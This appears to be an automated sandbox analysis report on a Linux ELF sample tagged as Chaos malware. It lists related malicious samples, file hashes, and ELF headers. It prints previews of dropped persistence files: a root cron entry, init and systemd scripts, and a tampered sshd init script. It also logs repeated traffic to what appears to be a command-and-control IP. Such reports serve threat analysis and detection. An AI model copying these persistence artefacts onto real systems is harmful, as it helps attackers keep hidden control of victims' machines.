                                        linux_ppc64el.elfGet hashmaliciousChaosBrowse
                                        • 103.135.101.78
                                        www.google.comlinux_arm6.elfGet hashmaliciousChaosBrowse
                                        • 142.250.181.100
                                        linux_ppc64el.elfGet hashmaliciousChaosBrowse
                                        • 142.250.181.100
                                        file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                        • 172.217.21.36
                                        https://shorturl.at/ZbKEL?REVd=Vhx6ZLBnjMmGet hashmaliciousUnknownBrowse
                                        • 172.217.21.36
                                        https://avidgroup.famislnc.com/fvcvfxfec/cc6d843dfd/?1f9da=amtsZW1wQGNhcmlzbHMuY29tGet hashmaliciousUnknownBrowse
                                        • 172.217.21.36
                                        file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, DarkTortilla, LummaC Stealer, Stealc, VidarBrowse
                                        • 142.250.181.100
                                        https://Saic.anastaclooverseas.com/zwfgemvfcbcitui/xivyvjldaquzs/Zgktmgjdfgpirwe89g0xmaersk/ixiswwcbzmfgee/jebqtppyunp/random.bby/inpoxqhfiww/gmail.com/ozwunijponqp8Get hashmaliciousUnknownBrowse
                                        • 142.250.181.100
                                        file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                        • 142.250.181.68
                                        file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                        • 142.250.181.68
                                        Fumari INC.emlGet hashmaliciousUnknownBrowse
                                        • 216.58.208.228
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        TH-AS-APTianhaiInfoTechCNlinux_arm6.elfGet hashmaliciousChaosBrowse
                                        • 103.135.101.78
                                        linux_ppc64el.elfGet hashmaliciousChaosBrowse
                                        • 103.135.101.78
                                        DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                        • 202.61.233.66
                                        Payload 94.75 (3).225.exeGet hashmaliciousUnknownBrowse
                                        • 202.61.204.198
                                        Payload 94.75.225.exeGet hashmaliciousUnknownBrowse
                                        • 202.61.196.212
                                        xi.arm.elfGet hashmaliciousMirai, MoobotBrowse
                                        • 103.135.101.188
                                        xi.arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                        • 103.135.101.188
                                        xi.m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                        • 103.135.101.188
                                        xi.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                        • 103.135.101.188
                                        xi.mips.elfGet hashmaliciousMirai, MoobotBrowse
                                        • 103.135.101.188
                                        No context
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        /.imglinux_arm6.elfGet hashmaliciousChaosBrowse
                                          linux_ppc64el.elfGet hashmaliciousChaosBrowse
                                            linux_386.elfGet hashmaliciousChaosBrowse
                                              linux_arm5.elfGet hashmaliciousChaosBrowse
                                                linux_arm6.elfGet hashmaliciousChaosBrowse
                                                  linux_arm64.elfGet hashmaliciousChaosBrowse
                                                    linux_amd64.elfGet hashmaliciousChaosBrowse
                                                      linux_arm7.elfGet hashmaliciousChaosBrowse
                                                        linux_arm5.elfGet hashmaliciousChaosBrowse
                                                          linux_arm7.elfGet hashmaliciousChaosBrowse
                                                            Process:/tmp/linux_386.elf
                                                            File Type:a /bin/sh\n/usr/lib/libdlrpcld.so script, ASCII text executable, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):33
                                                            Entropy (8bit):3.836081907815205
                                                            Encrypted:false
                                                            SSDEEP:3:TKH45vMMPiK:hVMM6K
                                                            MD5:D73D3376908EA075A939E3871AD0FABE
                                                            SHA1:320FF65831247BA199515F1B94DF26CC8A3E5F76
                                                            SHA-256:EDBDABE30D8236A2C0A4EB89DFD597552130E4C1A4E93F8FE1568920442AD73A
                                                            SHA-512:57B83FEF88620598BEB5D65626BF757D0ABEF242D2D6A01796A61474DEDC5095A4A9D0F292B6ABB450CAD3D4410AB8456253600F58DDB66CFE6D79E1C8415536
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Joe Sandbox View:
                                                            • Filename: linux_arm6.elf, Detection: malicious, Browse
                                                            • Filename: linux_ppc64el.elf, Detection: malicious, Browse
                                                            • Filename: linux_386.elf, Detection: malicious, Browse
                                                            • Filename: linux_arm5.elf, Detection: malicious, Browse
                                                            • Filename: linux_arm6.elf, Detection: malicious, Browse
                                                            • Filename: linux_arm64.elf, Detection: malicious, Browse
                                                            • Filename: linux_amd64.elf, Detection: malicious, Browse
                                                            • Filename: linux_arm7.elf, Detection: malicious, Browse
                                                            • Filename: linux_arm5.elf, Detection: malicious, Browse
                                                            • Filename: linux_arm7.elf, Detection: malicious, Browse
                                                            Reputation:moderate, very likely benign file
                                                            Preview:#!/bin/sh\n/usr/lib/libdlrpcld.so
                                                            Process:/tmp/linux_386.elf
                                                            File Type:POSIX shell script, ASCII text executable
                                                            Category:dropped
                                                            Size (bytes):61
                                                            Entropy (8bit):4.483513158259707
                                                            Encrypted:false
                                                            SSDEEP:3:TKH4vSNMOsUF4K0WJTDALWpgGAn:hisUF4kDALWRAn
                                                            MD5:768EAF287796DA19E1CF5E0B2FB1B161
                                                            SHA1:6A1CE2EE5CCC86D1F33806FEB14547B35290DF2A
                                                            SHA-256:1D22620DFB2A6715E5D745AED5CF841EDE0E75E1747F12B9B925A2D346BC7ECB
                                                            SHA-512:E6AF30C9DF4F7F47696069511E64ECBC8E841629D692EE4056503DF3533FB7A7A74960698826260355E1DBA7B6C562482A27A39BB51A4237473CE4B68472D620
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Reputation:moderate, very likely benign file
                                                            Preview:#!/bin/sh.while [ 1 ]; do.sleep 60./etc/id.services.conf.done
                                                            Process:/usr/bin/bash
                                                            File Type:ASCII text
                                                            Category:dropped
                                                            Size (bytes):24
                                                            Entropy (8bit):3.115748962019488
                                                            Encrypted:false
                                                            SSDEEP:3:HFdtKe2Gvn:l6e2Gvn
                                                            MD5:D38E3C32BA65827998A5C4EA922B3A9C
                                                            SHA1:D20193ED8143D4B9D78CEF7DAF7D59764FA61B93
                                                            SHA-256:5588E10DD163E4B8068413D7768EAC82A13D9A15F42B6E1302744371327D23F0
                                                            SHA-512:559DA77ED8085D20106CEAA1B019591AB37595EB4902A50C1805FE14C5F6C33F8FC82CF8F85E1A08D3D9BF38AD9F956FEC84BBA9A0F97AA5A5F7E78C9B10555F
                                                            Malicious:true
                                                            Reputation:moderate, very likely benign file
                                                            Preview:*/1 * * * * root /.img .
                                                            Process:/tmp/linux_386.elf
                                                            File Type:POSIX shell script, ASCII text executable
                                                            Category:dropped
                                                            Size (bytes):189
                                                            Entropy (8bit):5.112939120919767
                                                            Encrypted:false
                                                            SSDEEP:3:TKH4vfSgisKhW0GNstXWQfvYqkNDH2MDGKLQsUkDJREpsVWRQ0kDJRKVtAKOW0T6:hnSgisKhdtXpvPkVLDqklv4Q0klaARB6
                                                            MD5:3909975F7CC0D1121C1819B800069F31
                                                            SHA1:3E68DE708C2E6C40FAB6794AFDEE3104E5590189
                                                            SHA-256:6876DAC71F13A068AFB863D257134275F2EDBA43B2ACAF4924FABF97C079070B
                                                            SHA-512:50600CCEEB03B05F45AE61D890CAEE9F51FF390B6776930866E527E071D65D08241FC66673FD9B99D62FBC77D3C00FC3DE4D7378CBC42F5DABA5D83072B0906E
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Reputation:moderate, very likely benign file
                                                            Preview:#!/bin/sh...### BEGIN INIT INFO...#chkconfig: 2345 10 90...#description:System.img.config...# Default-Start:.2 3 4 5...# Default-Stop:...### END INIT INFO.../boot/System.img.config...exit 0
                                                            Process:/tmp/linux_386.elf
                                                            File Type:POSIX shell script, ASCII text executable
                                                            Category:dropped
                                                            Size (bytes):4255
                                                            Entropy (8bit):5.0509581566659865
                                                            Encrypted:false
                                                            SSDEEP:96:jkXSV2EmJrtSRyyHodopXHecKyWUiO8IhQ:j1oEmJpSJIONqdBIhQ
                                                            MD5:508355F283B1B75FCC556EC98D6ADF9D
                                                            SHA1:27FC04383EB62D903131ACFA430FAE891F06A59B
                                                            SHA-256:F25DD90E39812B068BBF33F63F1B5FF45A5555CE6ECEFE7110188A378D201E08
                                                            SHA-512:66318D20484BFD69850DFF95303256074EF529954A302BB9A34366013D30C389F213993F760A302326E40AFCFD9F8F5154BA14B06EB208AD7CEE5F23587D3DD0
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Reputation:moderate, very likely benign file
                                                            Preview:#! /bin/sh..### BEGIN INIT INFO.# Provides:..sshd.# Required-Start:.$remote_fs $syslog.# Required-Stop:.$remote_fs $syslog.# Default-Start:.2 3 4 5.# Default-Stop:...# Short-Description:.OpenBSD Secure Shell server.### END INIT INFO..set -e..# /etc/init.d/ssh: start and stop the OpenBSD "secure shell(tm)" daemon..test -x /usr/sbin/sshd || exit 0.( /usr/sbin/sshd -\? 2>&1 | grep -q OpenSSH ) 2>/dev/null || exit 0..umask 022..if test -f /etc/default/ssh; then.//lib/system-monitor. . /etc/default/ssh.fi... /lib/lsb/init-functions..if [ -n "$2" ]; then.//lib/system-monitor. SSHD_OPTS="$SSHD_OPTS $2".fi..# Are we running from init?.run_by_init() {. ([ "$previous" ] && [ "$runlevel" ]) || [ "$runlevel" = S ].}..check_for_no_start() {. # forget it if we're trying to start, and /etc/ssh/sshd_not_to_be_run exists. if [ -e /etc/ssh/sshd_not_to_be_run ]; then .//lib/system-monitor..if [ "$1" = log_end_msg ]; then.//lib/system-monitor.. log_end_msg 0 || true..fi..if ! run_by_init
                                                            Process:/tmp/linux_386.elf
                                                            File Type:a /bin/sh\n/etc/profile.d/bash_config script, ASCII text executable, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):37
                                                            Entropy (8bit):4.260279974311012
                                                            Encrypted:false
                                                            SSDEEP:3:TKH45/gK6nKUDn:hFP6KUDn
                                                            MD5:CFB4E51061485FE91169381FBDC1538E
                                                            SHA1:9A85B9B766A15B01737A41D680E4593B7A9BDE87
                                                            SHA-256:897F37267D0CEAA2FBDAA09847F5D08E6F8B01A0348A0D666264B0F10ACD0C90
                                                            SHA-512:FB154EC711D2090A7461DA4DB8DDAD2B522649A27E74162ECB203F539B1729430288BC02D78D2071BDE9C4BBC005693403A57612EF50277D52F816CB94524216
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:#!/bin/sh\n/etc/profile.d/bash_config
                                                            Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                            File Type:ASCII text
                                                            Category:dropped
                                                            Size (bytes):76
                                                            Entropy (8bit):3.7627880354948586
                                                            Encrypted:false
                                                            SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                                                            MD5:D86A1F5765F37989EB0EC3837AD13ECC
                                                            SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                                                            SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                                                            SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                                                            Malicious:false
                                                            Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                                                            Process:/usr/sbin/cron
                                                            File Type:very short file (no magic)
                                                            Category:dropped
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:V:V
                                                            MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                            SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                            SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                            SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                            Malicious:false
                                                            Preview:0
                                                            Process:/usr/sbin/cron
                                                            File Type:very short file (no magic)
                                                            Category:dropped
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:V:V
                                                            MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                            SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                            SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                            SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                            Malicious:false
                                                            Preview:0
                                                            Process:/usr/sbin/cron
                                                            File Type:very short file (no magic)
                                                            Category:dropped
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:V:V
                                                            MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                            SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                            SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                            SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                            Malicious:false
                                                            Preview:0
                                                            Process:/usr/sbin/cron
                                                            File Type:very short file (no magic)
                                                            Category:dropped
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:V:V
                                                            MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                            SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                            SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                            SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                            Malicious:false
                                                            Preview:0
                                                            Process:/usr/sbin/cron
                                                            File Type:ASCII text
                                                            Category:dropped
                                                            Size (bytes):10
                                                            Entropy (8bit):1.9219280948873623
                                                            Encrypted:false
                                                            SSDEEP:3:IhIdSc:IhIP
                                                            MD5:1683743BF85A14366AB7B36FA44DD22E
                                                            SHA1:38545F5323921DB8EB3159B5762129CC96101D15
                                                            SHA-256:8902D146EDC391130C419A7483140AEB31347843DE41AFBFD124E857AFC05D54
                                                            SHA-512:DCBE6B50E624B0BA4D1C9EA840B0CA32089BAEB1922D5CF7F3C2F6ED0E2DC4D19468D8E723D3CADBCB9D46C0A9FABBF853D2BB3A17E5740E6B1C418B513FB915
                                                            Malicious:false
                                                            Preview:5877.5877.
                                                            Process:/bin/sh
                                                            File Type:ASCII text
                                                            Category:dropped
                                                            Size (bytes):29
                                                            Entropy (8bit):3.952302977662386
                                                            Encrypted:false
                                                            SSDEEP:3:pKWNffSFneZn:kKSFneZn
                                                            MD5:F0FF1F84AA4225865074D448D0AFA741
                                                            SHA1:494C08DD38BBCA03D81DDB3770279F73EA36B7A2
                                                            SHA-256:019E7FDF96FB5A5E5DBDE5F565996B62BE27945B32156AD91CA7894BBCE2E15C
                                                            SHA-512:534A6AC3F864670E42E95EECA3477415975CBAFFEF9CE936EA853F15A2AA796CA2C795ED4624E42A941244FB18202828DE0D750E1C495582D38BAAACA5B6C673
                                                            Malicious:false
                                                            Preview:/bin/sh: 1: /.img: not found.
                                                            Process:/tmp/linux_386.elf
                                                            File Type:ASCII text
                                                            Category:dropped
                                                            Size (bytes):207
                                                            Entropy (8bit):4.790870113084517
                                                            Encrypted:false
                                                            SSDEEP:6:z86XWRBADMD+ns7HrDC17HrDfsRs7HrDCLQmWA4Rn:znWR2D2+nsr4rfs6rCLHWrn
                                                            MD5:D80CCC7CED99538F22336F2EC0249087
                                                            SHA1:BE4DE9F604E065B53076A3D7BA702FE98C6B8746
                                                            SHA-256:0DC3E8552C3E6217E0DC7FD440C7BA4C9CD6E676CE2561E4F71949D2783AE968
                                                            SHA-512:D798E6516571FCD03BDFFBD5405F320FB23422CEB563901658EFA4101B4568EABC27730F40C0BCF6DDE5509F01BA6965DD61F64675DAD695924F1DEA1746E6DE
                                                            Malicious:false
                                                            Preview:[Unit].Description=linux.After=network.target.[Service].Type=forking.ExecStart=/boot/System.img.config.ExecReload=/boot/System.img.config.ExecStop=/boot/System.img.config.[Install].WantedBy=multi-user.target
                                                            Process:/usr/sbin/sshd
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):384
                                                            Entropy (8bit):0.8735982127940438
                                                            Encrypted:false
                                                            SSDEEP:3:6r2aDLwbU5XdU//Xx/l:6rnMbU5O
                                                            MD5:E36EAC1D84DA59BDE0C3FFAC4832C719
                                                            SHA1:B3E5203C2DAFF5A813A270FA423CEAAE050EB521
                                                            SHA-256:F59432CE91693BB808D775044D7EB470F7E5F09F4ABBB1C85DED749D19145AB3
                                                            SHA-512:21A8CB5FC6E79CE698A30035F7364855C148124D628FA0FE466602682DBCE64681EEC31CBB4AC6E5C3C73D59DFD8C1B08A30F7BACBDAC559AFCCAB5299076FD8
                                                            Malicious:false
                                                            Preview:........ssh:notty...........................root............................192.168.2.14..............................................................................................................................................................................................................................................................Dg........................................
                                                            File type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, Go BuildID=M2967KDc3JCv7JT3dJNl/UwKSzruSqayTIOWLZXXm/BURNZtNWG7QV-0pWXslf/aajqpRFtYnvbFht06OtE, stripped
                                                            Entropy (8bit):6.2491632891297
                                                            TrID:
                                                            • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
                                                            • ELF Executable and Linkable format (generic) (4004/1) 49.84%
                                                            File name:linux_386.elf
                                                            File size:5'251'072 bytes
                                                            MD5:f5c59e70b89c03eb69f02a7be662ed59
                                                            SHA1:f1dc3d2d6c85692a2419517d3473bb370cf86510
                                                            SHA256:ae49891720a4fa75f48a58efd4fc5dcd369f8c99add24e781191616f46149457
                                                            SHA512:69a1fcdc968d5b2f2706a0c6294974d2cc211910033e8bd991ec9dad01eacf93b20dfb3c72f17130b29b53a8b1add45f04a6c1c7e1f81ff9f198184493354225
                                                            SSDEEP:49152:E33d0lGt6UHcFL7Rn2o03wiEhiDmzzd/9sARlBs/00Cpfx9a9uNFp9hW16klbU6V:E33GlbU8FwmzzRDZ9mWqRV
                                                            TLSH:18364A10FECB54F6D5031D3044ABE2AF67316D064B25EB83EA047F6AF97B6A51D32209
                                                            File Content Preview:.ELF........................4...........4. ...(.........4...4...4...................................d...d............................k)..k)..............p)...-...-..7#..7#...............L..0Q..0Q. c..............Q.td...............................e.......

                                                            ELF header

                                                            Class:ELF32
                                                            Data:2's complement, little endian
                                                            Version:1 (current)
                                                            Machine:Intel 80386
                                                            Version Number:0x1
                                                            Type:EXEC (Executable file)
                                                            OS/ABI:UNIX - System V
                                                            ABI Version:0
                                                            Entry Point Address:0x80ac1b0
                                                            Flags:0x0
                                                            ELF Header Size:52
                                                            Program Header Offset:52
                                                            Program Header Size:32
                                                            Number of Program Headers:7
                                                            Section Header Offset:276
                                                            Section Header Size:40
                                                            Number of Section Headers:14
                                                            Header String Table Index:3
                                                            NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                            NULL0x00x00x00x00x0000
                                                            .textPROGBITS0x80490000x10000x295b920x00x6AX0016
                                                            .rodataPROGBITS0x82df0000x2970000xd91b40x00x2A0032
                                                            .shstrtabSTRTAB0x00x3701c00xa50x00x0001
                                                            .typelinkPROGBITS0x83b82800x3702800x17c00x00x2A0032
                                                            .itablinkPROGBITS0x83b9a400x371a400x4a40x00x2A0032
                                                            .gosymtabPROGBITS0x83b9ee40x371ee40x00x00x2A001
                                                            .gopclntabPROGBITS0x83b9f000x371f000x1588dc0x00x2A0032
                                                            .go.buildinfoPROGBITS0x85130000x4cb0000xe00x00x3WA0016
                                                            .noptrdataPROGBITS0x85130e00x4cb0e00x302780x00x3WA0032
                                                            .dataPROGBITS0x85433600x4fb3600x5fa80x00x3WA0032
                                                            .bssNOBITS0x85493200x5013200x153fc0x00x3WA0032
                                                            .noptrbssNOBITS0x855e7200x5167200xe76c0x00x3WA0032
                                                            .note.go.buildidNOTE0x8048f9c0xf9c0x640x00x2A004
                                                            TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                            PHDR0x340x80480340x80480340xe00xe02.85970x4R 0x1000
                                                            NOTE0xf9c0x8048f9c0x8048f9c0x640x645.43330x4R 0x4.note.go.buildid
                                                            LOAD0x00x80480000x80480000x296b920x296b926.05900x5R E0x1000.text .note.go.buildid
                                                            LOAD0x2970000x82df0000x82df0000x2337dc0x2337dc5.80880x4R 0x1000.rodata .typelink .itablink .gosymtab .gopclntab
                                                            LOAD0x4cb0000x85130000x85130000x363200x59e8c5.87770x6RW 0x1000.go.buildinfo .noptrdata .data .bss .noptrbss
                                                            GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
                                                            LOOS+50415800x00x00x00x00x00.00000x2a00 0x4
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Nov 25, 2024 23:47:03.779952049 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:47:03.900120020 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:47:03.900216103 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:47:04.569660902 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:47:04.689655066 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:47:05.478903055 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:47:05.478916883 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:47:05.478990078 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:47:05.478990078 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:47:05.531332970 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:47:05.558192015 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:47:05.651320934 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:47:05.678169966 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:47:06.336711884 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:47:06.336783886 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:47:06.711698055 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:47:06.711792946 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:47:07.334068060 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:47:07.334121943 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:47:11.710752010 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:47:11.710813046 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:47:12.095596075 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:47:12.215588093 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:47:16.726017952 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:47:16.726083040 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:47:21.732770920 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:47:21.732848883 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:47:22.115333080 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:47:22.235470057 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:47:22.341401100 CET48720808192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:47:22.461390972 CET80848720103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:47:22.461524010 CET48720808192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:47:22.468425035 CET48720808192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:47:22.588397980 CET80848720103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:47:24.033026934 CET80848720103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:47:24.033094883 CET48720808192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:47:24.225359917 CET5883622192.168.2.13192.168.2.1
                                                            Nov 25, 2024 23:47:26.733858109 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:47:26.733942032 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:47:31.746992111 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:47:31.747147083 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:47:32.119494915 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:47:32.240323067 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:47:36.753412008 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:47:36.753540993 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:47:41.762913942 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:47:41.762984037 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:47:42.121758938 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:47:42.241928101 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:47:46.773211002 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:47:46.773324013 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:47:51.776487112 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:47:51.776578903 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:47:52.123666048 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:47:52.244048119 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:47:54.433459997 CET48720808192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:47:54.553435087 CET80848720103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:47:56.780464888 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:47:56.780565023 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:48:01.787842035 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:48:01.787957907 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:48:02.125612020 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:48:02.245795012 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:48:06.792552948 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:48:06.792639971 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:48:11.804215908 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:48:11.804608107 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:48:12.128292084 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:48:12.248279095 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:48:16.811103106 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:48:16.811212063 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:48:21.817724943 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:48:21.817866087 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:48:22.130239964 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:48:22.250353098 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:48:25.153517008 CET48720808192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:48:25.273473978 CET80848720103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:48:26.831978083 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:48:26.832073927 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:48:31.845129013 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:48:31.845237017 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:48:32.132921934 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:48:32.253164053 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:48:36.861712933 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:48:36.861835957 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:48:41.863146067 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:48:41.863389969 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:48:42.135006905 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:48:42.255227089 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:48:46.870635986 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:48:46.870769024 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:48:51.884368896 CET5246238944103.135.101.78192.168.2.13
